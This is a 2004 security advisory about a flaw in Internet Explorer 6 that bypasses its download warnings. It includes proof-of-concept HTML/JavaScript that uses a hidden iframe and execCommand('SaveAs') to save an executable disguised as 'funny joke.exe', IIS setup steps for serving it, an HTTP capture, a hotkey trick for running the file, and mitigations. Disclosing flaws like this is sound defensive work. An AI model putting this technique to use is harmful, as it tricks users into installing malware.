|
Brought to you by:
Suppliers of:
|
|
|
| |
| Microsoft Internet Explorer (including IE for Windows XP SP2) is reported to be vulnerable to a file downloading security warning bypass. This unpatched flaw may be exploited to download a malicious executable file masqueraded as an HTML file. |
| |
Credit:
The information has been provided by Cyber flash A.K.A Vengy and K-OTiK team.
The original article can be found at: http://www.k-otik.com/exploits/20041119.IESP2disclosure.php
Original exploit code can be found at: http://www.k-otik.com/exploits/20041119.IESP2Unpatched.php
|
| |
Vulnerable Systems:
* Internet Explorer version 6
When your browser cannot locate the URL that you entered in the address bar, you will receive a 404 error message telling you that the file was not found. This exploit described below utilizes a custom HTTP 404 error message (v.exe) which is feed to the execCommand Method, which in turn executes the file (without warning). The only user input required is for the user to accept a prompts requesting him to "Save an HTML Document".
1. Bypasses the "File Download - Security Warning".
Each time you click a download link, Windows XP pops up a "File Download - Security Warning", making you aware that Windows is downloading a program. In addition Windows XP will ask for your permission to complete the download process.
2. Bypasses the "Open File - Security Warning".
Launching a downloaded executable that originates from an untrusted location (zone) such as the Internet will bring up a "Open File - Security Warning" that will ask you for the permission to install the file.
The execCommand Method:
The execCommand method executes a command on the current document. One of the many parameters of this method is the SaveAs Command that saves the current Web page to a local file. The SaveAs Command has the following format: document.execCommand('SaveAs', '1', 'Name of the webpage.htm');
How does it work? (Exploit):
Notice that you didn't receive any warning messages such as: "File Download - Security Warning" or "Open File - Security Warning".
In addition, if "Hide file extensions for known file types" (Tools->Folder Options...->View) is enabled, (i.e., 'funny joke.exe' appears as 'funny joke') it's possible to trick a user into downloading a malicious executable file, masquerading it as an HTML document (Windows XP SP2 would normally prevents direct downloading, but in our case it doesn't).
The following code requires no special server setup, and should work from any web page that IE 6.0 downloads:
< html>
< body>
< iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0" height="0"></iframe>Click
< a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
here</a>.
</body>
</html>
In addition, here's an example that requires modifying the IIS Error Mapping Properties (see below):
Steps to configure IIS:
Launch Internet Information Services manager. Under the 'Custom Errors' tab, modify the Error Mapping Properties as follows:
* Error Code: 404
* Default Text: Not Found
* Message Type: URL
* URL: /v.exe (name of the executable)
Within the HTML page, insert an IFRAME as follows:
<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>
The file 'vengy404.htm' intentionally doesn't exist on the server, so it will trigger a 404 error message as defined above. But, the JavaScript code below references the stealthy v.exe data within the frame 'NotFound' and is linked to 'funny joke.exe' when prompted to save the file:
javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');
Entire code sample for the 404 error page:
< html>
< body>
< iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>Click
< a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
here</a>.
</body>
</html>
Breakdown of the TCP Stream going from an Internet Explorer to an IIS:
Here's what occurs internally when fetching the exploit web page plus the 404 error message (v.exe).
GET /// HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 16 Nov 2004 02:34:44 GMT
If-None-Match: "7e5914d584cbc41:10d2"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: insecure.hopto.org:53
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Server: Microsoft-IIS/5.1
Date: Tue, 16 Nov 2004 12:31:00 GMT
Content-Location: http://insecure.hopto.org:53/index.htm
ETag: "7e5914d584cbc41:10d2"
Content-Length: 0
GET ///vengy404.htm HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: insecure.hopto.org:53
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Cache-Control: no-cache,no-transform
Expires: Tue, 16 Nov 2004 12:31:00 GMT
Content-Location: http://insecure.hopto.org:53/v.exe?404;http://insecure.hopto.org///vengy404.htm
Vary: *
Date: Tue, 16 Nov 2004 12:31:00 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 91408
<---V.EXE binary data goes here --->
Solution:
Disable Active Scripting and the "Hide file extensions for known file types" option
[Tools->Folder Options-> View]
Conclusion:
Overall IE attempts to intercept risky code and prompts a security warning message, but it seems to allow custom HTTP errors to filter through those security checks.
Also, by creating a 404 .lnk shortcut file with a hotkey of 'Enter', saving it to the desktop installs a global hotkey, so it may be possible to execute the downloaded file by simply forcing the user to press the Enter key "alert('Thanks. Press Return')".
Funny and scary how a few well placed characters <iframe src='v.exe?.htm' .... can confuse the IE monster, whereas specifying <iframe src='v.exe' .... is handled correctly!
|
| Subject:
|
How can i save *.html for mozillaNetscapeOpera |
Date: |
22 Dec. 2005 |
| From: |
imthiyazmail.cyberneme.com |
The document.execCommand works well for IE 6. but not for mozilla, please send the code for mozilla/netscape/opera .
Warm Regards,
Imthiyaz |
|
|
|
|
|
|
